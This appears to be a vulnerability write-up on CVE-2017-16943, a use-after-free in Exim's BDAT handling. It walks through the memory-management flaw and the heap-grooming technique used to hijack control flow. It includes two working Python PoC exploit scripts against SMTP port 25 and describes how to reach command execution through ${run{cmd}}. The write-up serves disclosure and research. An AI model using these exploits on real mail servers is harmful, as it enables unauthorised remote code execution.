Original article is here
To explain this bug, we need to start with the memory management of exim. There is a series of functions starts with store_
such as store_get
, store_release
, store_reset
. These functions are used to manage dynamically allocated memory and improve performance. Its architecture is like the illustration below:
Initially, exim allocates a big storeblock (default 0x2000) and then cut it into stores when store_get
is called, using global pointers to record the size of unused memory and where to cut in next allocation. Once the current_block
is insufficient, it allocates a new block and appends it to the end of the chain, which is a linked list, and then makes current_block
point to it. Exim maintains three store_pool
, that is, there are three chains like the illustration above and every global variables are actually arrays.
This vulnerability is in receive_msg
where exim reads headers:
receive.c: 1817 receive_msg
if (ptr >= header_size - 4)
{
int oldsize = header_size;
/* header_size += 256; */
header_size *= 2;
if (!store_extend(next->text, oldsize, header_size))
{
uschar *newtext = store_get(header_size);
memcpy(newtext, next->text, ptr);
store_release(next->text);
next->text = newtext;
}
}
It seems normal if the store functions are just like realloc, malloc and free. However, they are different and cannot be used in this way. When exim tries to extend store, the function store_extend
checks whether the old store is the latest store allocated in current_block
. It returns False immediately if the check is failed.
store.c: 276 store_extend
if (CS ptr + rounded_oldsize != CS (next_yield[store_pool]) ||
inc > yield_length[store_pool] + rounded_oldsize - oldsize)
return FALSE;
Once store_extend
fails, exim tries to get a new store and release the old one. After we look into store_get
and store_release, we found that store_get
returns a store, but store_release
releases ablock if the store is at the head of it. That is to say, if next->text
points to the start the current_block
and store_get
cuts store inside it for newtext
, then store_release(next->text)
frees next->text
, which is equal to current_block
, and leaves newtext
and current_block
pointing to a freed memory area. Any further usage of these pointers leads to a use-after-free vulnerability. To trigger this bug, we need to make exim call store_get
after next->text
is allocated. This was impossible until BDAT command was introduced into exim. BDAT makes store_get
reachable and finally leads to an RCE.
Exim uses function pointers to switch between different input sources, such as receive_getc
, receive_getbuf
. When receiving BDAT data, receive_getc
is set to bdat_getc
in order to check left chunking data size and to handle following command of BDAT. In receive_msg
, exim also uses receive_getc
. It loops to read data, and stores data into next->text
, extends if insufficient.
receive.c: 1817 receive_msg
for (;;)
{
int ch = (receive_getc)(GETC_BUFFER_UNLIMITED);
/* If we hit EOF on a SMTP connection, it's an error, since incoming
SMTP must have a correct "." terminator. */
if (ch == EOF && smtp_input /* && !smtp_batched_input */)
{
smtp_reply = handle_lost_connection(US" (header)");
smtp_yield = FALSE;
goto TIDYUP; /* Skip to end of function */
}
In bdat_getc
, once the SIZE is reached, it tries to read the next BDAT command and raises error message if the following command is incorrect.
smtp_in.c: 628 bdat_getc
case BDAT_CMD:
{
int n;
if (sscanf(CS smtp_cmd_data, "%u %n", &chunking_datasize, &n) < 1)
{
(void) synprot_error(L_smtp_protocol_error, 501, NULL,
US"missing size for BDAT command");
return ERR;
}
In exim, it usually calls synprot_error
to raise error message, which also logs at the same time.
smtp_in.c: 628 bdat_getc
static int
synprot_error(int type, int code, uschar *data, uschar *errmess)
{
int yield = -1;
log_write(type, LOG_MAIN, "SMTP %s error in \"%s\" %s %s",
(type == L_smtp_syntax_error)? "syntax" : "protocol",
string_printing(smtp_cmd_buffer), host_and_ident(TRUE), errmess);
The log messages are printed by string_printing. This function ensures a string is printable. For this reason, it extends the string to transfer characters if any unprintable character exists, such as '\n'->'\\n'
. Therefore, it asks store_get
for memory to store strings.
This store makes if (!store_extend(next->text, oldsize, header_size))
in receive_msg
failed when next extension occurs and then triggers use-after-free.
The following is the Proof-of-Concept(PoC) python script of this vulnerability. This PoC controls the control flow of SMTP server and sets instruction pointer to 0xdeadbeef
. For fuzzing issue, we did change the runtime configuration of exim. As a result, this PoC works only when dkim is enabled. We use it as an example because the situation is less complicated. The version with default configuration is also exploitable, and we will discuss it at the end of this section.
# CVE-2017-16943 PoC by meh at DEVCORE
# pip install pwntools
from pwn import *
r = remote('127.0.0.1', 25)
r.recvline()
r.sendline("EHLO test")
r.recvuntil("250 HELP")
r.sendline("MAIL FROM:<[email protected]>")
r.recvline()
r.sendline("RCPT TO:<[email protected]>")
r.recvline()
r.sendline('a'*0x1250+'\x7f')
r.recvuntil('command')
r.sendline('BDAT 1')
r.sendline(':BDAT \x7f')
s = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)
r.send(s+ ':\r\n')
r.recvuntil('command')
r.send('\n')
r.interactive()
Running out of current_block
In order to achieve code execution, we need to make the next->text
get the first store of a block. That is, running out of current_block
and making store_get
allocate a new block. Therefore, we send a long message 'a'*0x1250+'\x7f'
with an unprintable character to cut current_block
, making yield_length
less than 0x100.
Starts BDAT data transfer
After that, we send BDAT command to start data transfer. At the beginning, next
and next->text
are allocated by store_get
.
The function dkim_exim_verify_init
is called sequentially and it also calls store_get
. Notice that this function uses ANOTHER store_pool
, so it allocates from heap without changing current_block
which next->text
also points to.
receive.c: 1734 receive_msg
if (smtp_input && !smtp_batched_input && !dkim_disable_verify)
dkim_exim_verify_init(chunking_state <= CHUNKING_OFFERED);
Call store_getc
inside bdat_getc
Then, we send a BDAT command without SIZE. Exim complains about the incorrect command and cuts the current_block
with store_get
in string_printing
.
Keep sending msg until extension and bug triggered
In this way, while we keep sending huge messages, current_block
gets freed after the extension. In the malloc.c of glibc (so called ptmalloc), system manages a linked list of freed memory chunks, which is called unsortbin. Freed chunks are put into unsortbin if it is not the last chunk on the heap. In step 2, dkim_exim_verify_init
allocated chunks after next->text
. Therefore, this chunk is put into unsortbin and the pointers of linked list are stored into the first 16 bytes of chunk (on x86-64). The location written is exactly current_block->next
, and therefore current_block->next
is overwritten to unsortbin
inside main_arena
of libc (linked list pointer fd
points back to unsortbin
if no other freed chunk exists).
Keep sending msg for the next extension
When the next extension occurs, store_get
tries to cut from main_arena
, which makes attackers able to overwrite all global variables below main_arena.
Overwrite global variables in libc
Finish sending message and trigger free()
In the PoC, we simply modified __free_hook
and ended the line. Exim calls store_reset
to reset the buffer and calls __free_hook
in free()
. At this stage, we successfully controlled instruction pointer $rip
.
However, this is not enough for an RCE because the arguments are uncontrollable. As a result, we improved this PoC to modify both __free_hook
and _IO_2_1_stdout_
. We forged the vtable of stdout
and set __free_hook
to any call of fflush(stdout)
inside exim. When the program calls fflush, it sets the first argument to stdout and jumps to a function pointer on the vtable of stdout. Hence, we can control both $rip
and the content of first argument.
We consulted past CVE exploits and decided to call expand_string
, which executes command with execv
if we set the first argument to ${run{cmd}}
, and finally we got our RCE.
When dkim is disabled, the PoC above fails because current_block
is the last chunk on heap. This makes the system merge it into a big chunk called top chunk rather than unsortbin.
The illustrations below describe the difference of heap layout:
To avoid this, we need to make exim allocate and free some memories before we actually start our exploitation. Therefore, we add some steps between step 1 and step 2.
After running out of current_block
:
store_get
to retrieve a bigger store and then releases the old one. This repeats many times if the data is long enough. Therefore, we have a big chunk in unsortbin.yield_length
againcurrent_block
.Finally the heap layout is like:
And now we can go back to the step 2 at the beginning and create the same situation. When next->text
is freed, it goes back to unsortbin and we are able to overwrite libc global variables again.
The following is the PoC for default configured exim:
# CVE-2017-16943 PoC by meh at DEVCORE
# pip install pwntools
from pwn import *
r = remote('localhost', 25)
r.recvline()
r.sendline("EHLO test")
r.recvuntil("250 HELP")
r.sendline("MAIL FROM:<>")
r.recvline()
r.sendline("RCPT TO:<[email protected]>")
r.recvline()
r.sendline('a'*0x1280+'\x7f')
r.recvuntil('command')
r.sendline('DATA')
r.recvuntil('itself\r\n')
r.sendline('b'*0x4000+':\r\n')
r.sendline('.\r\n')
r.sendline('.\r\n')
r.recvline()
r.sendline("MAIL FROM:<>")
r.recvline()
r.sendline("RCPT TO:<[email protected]>")
r.recvline()
r.sendline('a'*0x3480+'\x7f')
r.recvuntil('command')
r.sendline('BDAT 1')
r.sendline(':BDAT \x7f')
s = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)
r.send(s+ ':\r\n')
r.send('\n')
r.interactive()
A demo of our exploit is as below.
Note that we have not found a way to leak memory address and therefore we use heap spray instead. It requires another information leakage vulnerability to overcome the PIE mitigation on x86-64.
Remote code execution on remote mail server, affecting over 500k mail servers.